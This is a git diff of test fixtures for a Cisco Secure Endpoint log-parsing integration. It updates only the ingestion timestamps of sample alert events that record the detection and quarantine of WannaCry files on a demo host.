@@ -5102,7 +5102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010940500Z", + "ingested": "2021-12-14T14:40:52.874160371Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 84d6a848011..a1c679f2888 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json 
@@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461437500Z", + "ingested": "2021-12-14T14:40:57.457036813Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -104,7 +104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461446400Z", + "ingested": "2021-12-14T14:40:57.457040209Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -180,7 +180,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461470300Z", + "ingested": "2021-12-14T14:40:57.457040789Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -256,7 +256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461478400Z", + "ingested": "2021-12-14T14:40:57.457041158Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -332,7 +332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461482400Z", + "ingested": "2021-12-14T14:40:57.457041577Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -408,7 +408,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461487300Z", + "ingested": "2021-12-14T14:40:57.457041940Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -496,7 +496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461493200Z", + "ingested": "2021-12-14T14:40:57.457042317Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -593,7 +593,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461499200Z", + "ingested": "2021-12-14T14:40:57.457042971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -683,7 +683,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461503100Z", + "ingested": "2021-12-14T14:40:57.457043333Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -769,7 +769,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461507100Z", + "ingested": "2021-12-14T14:40:57.457043804Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -843,7 +843,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461510700Z", + "ingested": "2021-12-14T14:40:57.457044162Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -915,7 +915,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461515400Z", + "ingested": "2021-12-14T14:40:57.457044755Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -987,7 +987,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461521100Z", + "ingested": "2021-12-14T14:40:57.457045123Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", 
@@ -1071,7 +1071,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461526200Z", + "ingested": "2021-12-14T14:40:57.457046609Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1170,7 +1170,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461531900Z", + "ingested": "2021-12-14T14:40:57.457047145Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", 
"kind": "alert", @@ -1271,7 +1271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461537700Z", + "ingested": "2021-12-14T14:40:57.457047649Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\